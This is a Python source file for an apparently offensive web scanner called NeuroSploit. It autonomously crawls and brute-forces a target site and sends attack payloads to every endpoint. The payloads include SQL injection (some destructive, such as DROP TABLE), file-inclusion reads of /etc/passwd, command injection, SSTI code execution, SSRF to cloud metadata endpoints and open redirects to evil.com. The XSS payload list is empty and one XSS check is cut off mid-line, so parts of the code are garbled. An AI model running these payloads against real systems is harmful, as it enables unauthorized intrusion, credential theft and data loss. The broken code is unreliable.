""" NeuroSploit v3 - Autonomous Scanner This module performs autonomous endpoint discovery and vulnerability testing when reconnaissance finds little or nothing. It actively: 1. Bruteforces directories using ffuf/gobuster/feroxbuster 2. Crawls the site aggressively 3. Tests common vulnerable endpoints 4. Generates test cases based on common patterns 5. Adapts based on what it discovers GLOBAL AUTHORIZATION: This tool is designed for authorized penetration testing only. All tests are performed with explicit authorization from the target owner. """ import asyncio import aiohttp import subprocess import json import re import os from typing import Dict, List, Any, Optional, Callable from urllib.parse import urljoin, urlparse, parse_qs, urlencode from dataclasses import dataclass, field from datetime import datetime @dataclass class DiscoveredEndpoint: """Represents a discovered endpoint""" url: str method: str = "GET" status_code: int = 0 content_type: str = "" content_length: int = 0 parameters: List[str] = field(default_factory=list) source: str = "discovery" # How it was discovered interesting: bool = False # Potentially vulnerable @dataclass class TestResult: """Result of a vulnerability test""" endpoint: str vuln_type: str payload: str is_vulnerable: bool confidence: float evidence: str request: Dict response: Dict class AutonomousScanner: """ Autonomous vulnerability scanner that actively discovers and tests endpoints. Works independently of reconnaissance - if recon fails, this scanner will: 1. Crawl the target site 2. Discover directories via bruteforce 3. Find parameters and endpoints 4. Test all discovered points for vulnerabilities """ # Common vulnerable endpoints to always test COMMON_ENDPOINTS = [ # Login/Auth "/login", "/signin", "/auth", "/admin", "/admin/login", "/wp-admin", "/user/login", "/account/login", "/administrator", # API endpoints "/api", "/api/v1", "/api/v2", "/api/users", "/api/user", "/api/login", "/api/auth", "/api/token", "/graphql", # File operations "/upload", "/download", "/file", "/files", "/documents", "/images", "/media", "/assets", "/static", # Common vulnerable paths "/search", "/query", "/find", "/lookup", "/include", "/page", "/view", "/show", "/display", "/read", "/load", "/fetch", "/get", # Debug/Dev "/debug", "/test", "/dev", "/staging", "/phpinfo.php", "/.env", "/.git/config", "/server-status", "/server-info", # CMS specific "/wp-content", "/wp-includes", "/xmlrpc.php", "/joomla", "/drupal", "/magento", # Config files "/config.php", "/configuration.php", "/settings.php", "/web.config", "/config.xml", "/config.json", # Backup files "/backup", "/backup.sql", "/dump.sql", "/db.sql", "/database.sql", ] # Common parameters to test COMMON_PARAMS = [ "id", "page", "file", "path", "url", "redirect", "next", "query", "search", "q", "s", "keyword", "term", "user", "username", "name", "email", "login", "cat", "category", "item", "product", "article", "action", "cmd", "command", "exec", "run", "template", "tpl", "theme", "lang", "language", "sort", "order", "orderby", "filter", "callback", "jsonp", "format", "type", "debug", "test", "demo", "preview", ] # XSS test payloads XSS_PAYLOADS = [ "", "", "'\">", "", "javascript:alert('XSS')", "", "'-alert('XSS')-'", "\">", ] # SQLi test payloads SQLI_PAYLOADS = [ "'", "\"", "' OR '1'='1", "\" OR \"1\"=\"1", "' OR 1=1--", "\" OR 1=1--", "1' AND '1'='1", "'; DROP TABLE users--", "1; SELECT * FROM users", "' UNION SELECT NULL--", "' UNION SELECT 1,2,3--", "1' AND SLEEP(5)--", "1'; WAITFOR DELAY '0:0:5'--", "admin'--", "admin' #", "admin'/*", ] # LFI test payloads LFI_PAYLOADS = [ "../../../etc/passwd", "....//....//....//etc/passwd", "/etc/passwd", "..\\..\\..\\windows\\win.ini", "file:///etc/passwd", "/proc/self/environ", "php://filter/convert.base64-encode/resource=index.php", "php://input", "expect://id", "data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==", ] # Command injection payloads CMDI_PAYLOADS = [ "; id", "| id", "|| id", "&& id", "; whoami", "| whoami", "|| whoami", "`id`", "$(id)", "${id}", "; cat /etc/passwd", "| cat /etc/passwd", "; ping -c 3 127.0.0.1", "| ping -c 3 127.0.0.1", ] # SSTI payloads SSTI_PAYLOADS = [ "{{7*7}}", "${7*7}", "<%= 7*7 %>", "{{config}}", "{{self}}", "{{request}}", "${T(java.lang.Runtime).getRuntime().exec('id')}", "{{''.__class__.__mro__[2].__subclasses__()}}", "@(1+2)", "#{7*7}", ] # SSRF payloads SSRF_PAYLOADS = [ "http://localhost", "http://127.0.0.1", "http://[::1]", "http://0.0.0.0", "http://169.254.169.254/latest/meta-data/", "http://metadata.google.internal/", "file:///etc/passwd", "dict://localhost:11211/", "gopher://localhost:6379/_", ] def __init__( self, scan_id: str, log_callback: Optional[Callable] = None, timeout: int = 15, max_depth: int = 3 ): self.scan_id = scan_id self.log_callback = log_callback or self._default_log self.timeout = timeout self.max_depth = max_depth self.discovered_endpoints: List[DiscoveredEndpoint] = [] self.tested_urls: set = set() self.vulnerabilities: List[TestResult] = [] self.session: Optional[aiohttp.ClientSession] = None self.wordlist_path = "/opt/wordlists/common.txt" async def _default_log(self, level: str, message: str): """Default logging""" print(f"[{level.upper()}] {message}") async def log(self, level: str, message: str): """Log a message""" if asyncio.iscoroutinefunction(self.log_callback): await self.log_callback(level, message) else: self.log_callback(level, message) async def __aenter__(self): connector = aiohttp.TCPConnector(ssl=False, limit=50) timeout = aiohttp.ClientTimeout(total=self.timeout) self.session = aiohttp.ClientSession(connector=connector, timeout=timeout) return self async def __aexit__(self, *args): if self.session: await self.session.close() async def run_autonomous_scan( self, target_url: str, recon_data: Optional[Dict] = None ) -> Dict[str, Any]: """ Run a fully autonomous scan on the target. This will: 1. Spider/crawl the target 2. Discover directories 3. Find parameters 4. Test all discovered endpoints Returns comprehensive results even if recon found nothing. """ await self.log("info", f"Starting autonomous scan on: {target_url}") await self.log("info", "This is an authorized penetration test.") parsed = urlparse(target_url) base_url = f"{parsed.scheme}://{parsed.netloc}" results = { "target": target_url, "started_at": datetime.utcnow().isoformat(), "endpoints": [], "vulnerabilities": [], "parameters_found": [], "directories_found": [], "technologies": [] } # Phase 1: Initial probe await self.log("info", "Phase 1: Initial target probe...") initial_info = await self._probe_target(target_url) results["technologies"] = initial_info.get("technologies", []) await self.log("info", f" Technologies detected: {', '.join(results['technologies']) or 'None'}") # Phase 2: Directory discovery await self.log("info", "Phase 2: Directory discovery...") directories = await self._discover_directories(base_url) results["directories_found"] = directories await self.log("info", f" Found {len(directories)} directories") # Phase 3: Crawl the site await self.log("info", "Phase 3: Crawling site for links and forms...") crawled = await self._crawl_site(target_url) await self.log("info", f" Crawled {len(crawled)} pages") # Phase 4: Discover parameters await self.log("info", "Phase 4: Parameter discovery...") parameters = await self._discover_parameters(target_url) results["parameters_found"] = parameters await self.log("info", f" Found {len(parameters)} parameters") # Phase 5: Generate test endpoints await self.log("info", "Phase 5: Generating test endpoints...") test_endpoints = self._generate_test_endpoints(target_url, parameters, directories) await self.log("info", f" Generated {len(test_endpoints)} test endpoints") # Merge with any recon data if recon_data: for url in recon_data.get("urls", []): self._add_endpoint(url, source="recon") for endpoint in recon_data.get("endpoints", []): if isinstance(endpoint, dict): self._add_endpoint(endpoint.get("url", ""), source="recon") # Add test endpoints for ep in test_endpoints: self._add_endpoint(ep["url"], source=ep.get("source", "generated")) results["endpoints"] = [ { "url": ep.url, "method": ep.method, "status": ep.status_code, "source": ep.source, "parameters": ep.parameters } for ep in self.discovered_endpoints ] # Phase 6: Vulnerability testing await self.log("info", f"Phase 6: Testing {len(self.discovered_endpoints)} endpoints for vulnerabilities...") for i, endpoint in enumerate(self.discovered_endpoints): if endpoint.url in self.tested_urls: continue self.tested_urls.add(endpoint.url) await self.log("debug", f" [{i+1}/{len(self.discovered_endpoints)}] Testing: {endpoint.url[:80]}...") # Test each vulnerability type vulns = await self._test_endpoint_all_vulns(endpoint) self.vulnerabilities.extend(vulns) # Log findings immediately for vuln in vulns: await self.log("warning", f" FOUND: {vuln.vuln_type} on {endpoint.url[:60]} (confidence: {vuln.confidence:.0%})") results["vulnerabilities"] = [ { "type": v.vuln_type, "endpoint": v.endpoint, "payload": v.payload, "confidence": v.confidence, "evidence": v.evidence[:500] } for v in self.vulnerabilities ] results["completed_at"] = datetime.utcnow().isoformat() results["summary"] = { "endpoints_tested": len(self.tested_urls), "vulnerabilities_found": len(self.vulnerabilities), "critical": len([v for v in self.vulnerabilities if v.confidence >= 0.9]), "high": len([v for v in self.vulnerabilities if 0.7 <= v.confidence < 0.9]), "medium": len([v for v in self.vulnerabilities if 0.5 <= v.confidence < 0.7]), } await self.log("info", f"Autonomous scan complete. Found {len(self.vulnerabilities)} potential vulnerabilities.") return results def _add_endpoint(self, url: str, source: str = "discovery"): """Add an endpoint if not already discovered""" if not url: return for ep in self.discovered_endpoints: if ep.url == url: return self.discovered_endpoints.append(DiscoveredEndpoint(url=url, source=source)) async def _probe_target(self, url: str) -> Dict: """Initial probe to gather info about the target""" info = {"technologies": [], "headers": {}, "server": ""} try: async with self.session.get(url, headers={"User-Agent": "NeuroSploit/3.0"}) as resp: info["headers"] = dict(resp.headers) info["status"] = resp.status body = await resp.text() # Detect technologies if "wp-content" in body or "WordPress" in body: info["technologies"].append("WordPress") if "Joomla" in body: info["technologies"].append("Joomla") if "Drupal" in body: info["technologies"].append("Drupal") if "react" in body.lower() or "React" in body: info["technologies"].append("React") if "angular" in body.lower(): info["technologies"].append("Angular") if "vue" in body.lower(): info["technologies"].append("Vue.js") if "php" in body.lower() or ".php" in body: info["technologies"].append("PHP") if "asp.net" in body.lower() or "aspx" in body.lower(): info["technologies"].append("ASP.NET") if "java" in body.lower() or "jsp" in body.lower(): info["technologies"].append("Java") # Server header info["server"] = resp.headers.get("Server", "") if info["server"]: info["technologies"].append(f"Server: {info['server']}") # X-Powered-By powered_by = resp.headers.get("X-Powered-By", "") if powered_by: info["technologies"].append(f"Powered by: {powered_by}") except Exception as e: await self.log("debug", f"Probe error: {str(e)}") return info async def _discover_directories(self, base_url: str) -> List[str]: """Discover directories using built-in wordlist and common paths""" found_dirs = [] # First try common endpoints await self.log("debug", " Testing common endpoints...") tasks = [] for endpoint in self.COMMON_ENDPOINTS: url = urljoin(base_url, endpoint) tasks.append(self._check_url_exists(url)) results = await asyncio.gather(*tasks, return_exceptions=True) for endpoint, result in zip(self.COMMON_ENDPOINTS, results): if isinstance(result, dict) and result.get("exists"): found_dirs.append(endpoint) self._add_endpoint(urljoin(base_url, endpoint), source="directory_bruteforce") await self.log("debug", f" Found: {endpoint} [{result.get('status')}]") # Try using ffuf if available if await self._tool_available("ffuf"): await self.log("debug", " Running ffuf directory scan...") ffuf_results = await self._run_ffuf(base_url) for path in ffuf_results: if path not in found_dirs: found_dirs.append(path) self._add_endpoint(urljoin(base_url, path), source="ffuf") return found_dirs async def _check_url_exists(self, url: str) -> Dict: """Check if a URL exists (returns 2xx or 3xx)""" try: async with self.session.get( url, headers={"User-Agent": "NeuroSploit/3.0"}, allow_redirects=False ) as resp: exists = resp.status < 400 and resp.status != 404 return {"exists": exists, "status": resp.status} except: return {"exists": False, "status": 0} async def _tool_available(self, tool_name: str) -> bool: """Check if a tool is available""" try: result = subprocess.run( ["which", tool_name], capture_output=True, timeout=5 ) return result.returncode == 0 except: return False async def _run_ffuf(self, base_url: str) -> List[str]: """Run ffuf for directory discovery""" found = [] try: wordlist = self.wordlist_path if os.path.exists(self.wordlist_path) else None if not wordlist: return found cmd = [ "ffuf", "-u", f"{base_url}/FUZZ", "-w", wordlist, "-mc", "200,201,301,302,307,401,403,500", "-t", "20", "-timeout", "10", "-o", "/tmp/ffuf_out.json", "-of", "json", "-s" # Silent ] process = await asyncio.create_subprocess_exec( *cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE ) await asyncio.wait_for(process.wait(), timeout=120) if os.path.exists("/tmp/ffuf_out.json"): with open("/tmp/ffuf_out.json", "r") as f: data = json.load(f) for result in data.get("results", []): path = "/" + result.get("input", {}).get("FUZZ", "") if path and path != "/": found.append(path) os.remove("/tmp/ffuf_out.json") except Exception as e: await self.log("debug", f"ffuf error: {str(e)}") return found async def _crawl_site(self, url: str) -> List[str]: """Crawl the site to find links, forms, and endpoints""" crawled = [] to_crawl = [url] visited = set() depth = 0 parsed_base = urlparse(url) base_domain = parsed_base.netloc while to_crawl and depth < self.max_depth: current_batch = to_crawl[:20] # Crawl 20 at a time to_crawl = to_crawl[20:] tasks = [] for page_url in current_batch: if page_url in visited: continue visited.add(page_url) tasks.append(self._extract_links(page_url, base_domain)) results = await asyncio.gather(*tasks, return_exceptions=True) for result in results: if isinstance(result, list): crawled.extend(result) for link in result: if link not in visited and link not in to_crawl: to_crawl.append(link) depth += 1 return list(set(crawled)) async def _extract_links(self, url: str, base_domain: str) -> List[str]: """Extract links and forms from a page""" links = [] try: async with self.session.get( url, headers={"User-Agent": "NeuroSploit/3.0"} ) as resp: body = await resp.text() # Extract href links href_pattern = r'href=["\']([^"\']+)["\']' for match in re.finditer(href_pattern, body, re.IGNORECASE): link = match.group(1) full_url = urljoin(url, link) parsed = urlparse(full_url) if parsed.netloc == base_domain: links.append(full_url) self._add_endpoint(full_url, source="crawler") # Extract src attributes src_pattern = r'src=["\']([^"\']+)["\']' for match in re.finditer(src_pattern, body, re.IGNORECASE): link = match.group(1) full_url = urljoin(url, link) if ".js" in full_url or ".php" in full_url: self._add_endpoint(full_url, source="crawler") # Extract form actions form_pattern = r']*action=["\']([^"\']*)["\'][^>]*>' for match in re.finditer(form_pattern, body, re.IGNORECASE): action = match.group(1) or url full_url = urljoin(url, action) self._add_endpoint(full_url, source="form") # Extract URLs from JavaScript js_url_pattern = r'["\']/(api|v1|v2|user|admin|login|auth)[^"\']*["\']' for match in re.finditer(js_url_pattern, body): path = match.group(0).strip("\"'") full_url = urljoin(url, path) self._add_endpoint(full_url, source="javascript") except Exception as e: pass return links async def _discover_parameters(self, url: str) -> List[str]: """Discover parameters through various methods""" found_params = set() # Extract from URL parsed = urlparse(url) if parsed.query: params = parse_qs(parsed.query) found_params.update(params.keys()) # Try common parameters await self.log("debug", " Testing common parameters...") base_url = url.split("?")[0] for param in self.COMMON_PARAMS[:20]: # Test top 20 test_url = f"{base_url}?{param}=test123" try: async with self.session.get( test_url, headers={"User-Agent": "NeuroSploit/3.0"} ) as resp: body = await resp.text() # Check if parameter is reflected or changes response if "test123" in body or resp.status == 200: found_params.add(param) except: pass # Try arjun if available if await self._tool_available("arjun"): await self.log("debug", " Running arjun parameter discovery...") try: process = await asyncio.create_subprocess_exec( "arjun", "-u", url, "-o", "/tmp/arjun_out.json", "-q", stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE ) await asyncio.wait_for(process.wait(), timeout=60) if os.path.exists("/tmp/arjun_out.json"): with open("/tmp/arjun_out.json", "r") as f: data = json.load(f) for url_data in data.values(): if isinstance(url_data, list): found_params.update(url_data) os.remove("/tmp/arjun_out.json") except: pass return list(found_params) def _generate_test_endpoints( self, target_url: str, parameters: List[str], directories: List[str] ) -> List[Dict]: """Generate test endpoints based on discovered information""" endpoints = [] parsed = urlparse(target_url) base_url = f"{parsed.scheme}://{parsed.netloc}" # Generate endpoint + parameter combinations for directory in directories: full_url = urljoin(base_url, directory) endpoints.append({"url": full_url, "source": "directory"}) # Add with common parameters for param in self.COMMON_PARAMS[:10]: test_url = f"{full_url}?{param}=FUZZ" endpoints.append({"url": test_url, "source": "param_injection"}) # Target URL with discovered parameters for param in parameters: test_url = f"{target_url.split('?')[0]}?{param}=FUZZ" endpoints.append({"url": test_url, "source": "discovered_param"}) # Multi-param combinations if len(parameters) >= 2: param_string = "&".join([f"{p}=FUZZ" for p in parameters[:5]]) test_url = f"{target_url.split('?')[0]}?{param_string}" endpoints.append({"url": test_url, "source": "multi_param"}) return endpoints async def _test_endpoint_all_vulns(self, endpoint: DiscoveredEndpoint) -> List[TestResult]: """Test an endpoint for all vulnerability types""" results = [] url = endpoint.url # Test XSS xss_result = await self._test_xss(url) if xss_result: results.append(xss_result) # Test SQLi sqli_result = await self._test_sqli(url) if sqli_result: results.append(sqli_result) # Test LFI lfi_result = await self._test_lfi(url) if lfi_result: results.append(lfi_result) # Test Command Injection cmdi_result = await self._test_cmdi(url) if cmdi_result: results.append(cmdi_result) # Test SSTI ssti_result = await self._test_ssti(url) if ssti_result: results.append(ssti_result) # Test Open Redirect redirect_result = await self._test_open_redirect(url) if redirect_result: results.append(redirect_result) return results async def _inject_payload(self, url: str, payload: str) -> Optional[Dict]: """Inject a payload into URL parameters""" try: if "?" in url: base, query = url.split("?", 1) params = {} for p in query.split("&"): if "=" in p: k, v = p.split("=", 1) params[k] = payload else: params[p] = payload test_url = base + "?" + urlencode(params) else: # Add payload as common parameter test_url = f"{url}?id={payload}&q={payload}" async with self.session.get( test_url, headers={"User-Agent": "NeuroSploit/3.0"}, allow_redirects=False ) as resp: body = await resp.text() return { "url": test_url, "status": resp.status, "headers": dict(resp.headers), "body": body[:5000], "payload": payload } except: return None async def _test_xss(self, url: str) -> Optional[TestResult]: """Test for XSS vulnerabilities""" for payload in self.XSS_PAYLOADS: result = await self._inject_payload(url, payload) if not result: continue # Check if payload is reflected if payload in result["body"]: return TestResult( endpoint=url, vuln_type="xss_reflected", payload=payload, is_vulnerable=True, confidence=0.8, evidence=f"Payload reflected in response: {payload}", request={"url": result["url"], "method": "GET"}, response={"status": result["status"], "body_preview": result["body"][:500]} ) # Check for unescaped reflection if payload.replace("<", "<").replace(">", ">") not in result["body"]: if any(tag in result["body"] for tag in [" Optional[TestResult]: """Test for SQL injection vulnerabilities""" error_patterns = [ "sql syntax", "mysql", "sqlite", "postgresql", "oracle", "syntax error", "unclosed quotation", "unterminated string", "query failed", "database error", "odbc", "jdbc", "microsoft sql", "pg_query", "mysql_fetch", "ora-", "quoted string not properly terminated" ] for payload in self.SQLI_PAYLOADS: result = await self._inject_payload(url, payload) if not result: continue body_lower = result["body"].lower() # Check for SQL error messages for pattern in error_patterns: if pattern in body_lower: return TestResult( endpoint=url, vuln_type="sqli_error", payload=payload, is_vulnerable=True, confidence=0.9, evidence=f"SQL error pattern found: {pattern}", request={"url": result["url"], "method": "GET"}, response={"status": result["status"], "body_preview": result["body"][:500]} ) # Test for time-based blind SQLi time_payloads = ["1' AND SLEEP(5)--", "1'; WAITFOR DELAY '0:0:5'--"] for payload in time_payloads: import time start = time.time() result = await self._inject_payload(url, payload) elapsed = time.time() - start if elapsed >= 4.5: # Account for network latency return TestResult( endpoint=url, vuln_type="sqli_blind_time", payload=payload, is_vulnerable=True, confidence=0.7, evidence=f"Response delayed by {elapsed:.1f}s (expected 5s)", request={"url": url, "method": "GET"}, response={"status": 0, "body_preview": "TIMEOUT"} ) return None async def _test_lfi(self, url: str) -> Optional[TestResult]: """Test for Local File Inclusion vulnerabilities""" lfi_indicators = [ "root:x:", "root:*:", "[boot loader]", "[operating systems]", "bin/bash", "/bin/sh", "daemon:", "www-data:", "[extensions]", "[fonts]", "extension=", ] for payload in self.LFI_PAYLOADS: result = await self._inject_payload(url, payload) if not result: continue body_lower = result["body"].lower() for indicator in lfi_indicators: if indicator.lower() in body_lower: return TestResult( endpoint=url, vuln_type="lfi", payload=payload, is_vulnerable=True, confidence=0.95, evidence=f"File content indicator found: {indicator}", request={"url": result["url"], "method": "GET"}, response={"status": result["status"], "body_preview": result["body"][:500]} ) return None async def _test_cmdi(self, url: str) -> Optional[TestResult]: """Test for Command Injection vulnerabilities""" cmdi_indicators = [ "uid=", "gid=", "groups=", "root:x:", "linux", "darwin", "bin/", "/usr/", "volume serial number", "directory of", ] for payload in self.CMDI_PAYLOADS: result = await self._inject_payload(url, payload) if not result: continue body_lower = result["body"].lower() for indicator in cmdi_indicators: if indicator.lower() in body_lower: return TestResult( endpoint=url, vuln_type="command_injection", payload=payload, is_vulnerable=True, confidence=0.9, evidence=f"Command output indicator found: {indicator}", request={"url": result["url"], "method": "GET"}, response={"status": result["status"], "body_preview": result["body"][:500]} ) return None async def _test_ssti(self, url: str) -> Optional[TestResult]: """Test for Server-Side Template Injection""" # Mathematical expressions that should evaluate math_payloads = [ ("{{7*7}}", "49"), ("${7*7}", "49"), ("<%= 7*7 %>", "49"), ("{{7*'7'}}", "7777777"), ("#{7*7}", "49"), ] for payload, expected in math_payloads: result = await self._inject_payload(url, payload) if not result: continue if expected in result["body"] and payload not in result["body"]: return TestResult( endpoint=url, vuln_type="ssti", payload=payload, is_vulnerable=True, confidence=0.85, evidence=f"Template expression evaluated: {payload} -> {expected}", request={"url": result["url"], "method": "GET"}, response={"status": result["status"], "body_preview": result["body"][:500]} ) return None async def _test_open_redirect(self, url: str) -> Optional[TestResult]: """Test for Open Redirect vulnerabilities""" redirect_payloads = [ "https://evil.com", "//evil.com", "////evil.com", "https:evil.com", "/\\evil.com", "///evil.com/%2f..", ] redirect_params = ["url", "redirect", "next", "return", "goto", "dest", "rurl", "target"] parsed = urlparse(url) base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}" for param in redirect_params: for payload in redirect_payloads: test_url = f"{base_url}?{param}={payload}" try: async with self.session.get( test_url, headers={"User-Agent": "NeuroSploit/3.0"}, allow_redirects=False ) as resp: if resp.status in [301, 302, 303, 307, 308]: location = resp.headers.get("Location", "") if "evil.com" in location: return TestResult( endpoint=url, vuln_type="open_redirect", payload=payload, is_vulnerable=True, confidence=0.85, evidence=f"Redirects to external domain: {location}", request={"url": test_url, "method": "GET"}, response={"status": resp.status, "location": location} ) except: pass return None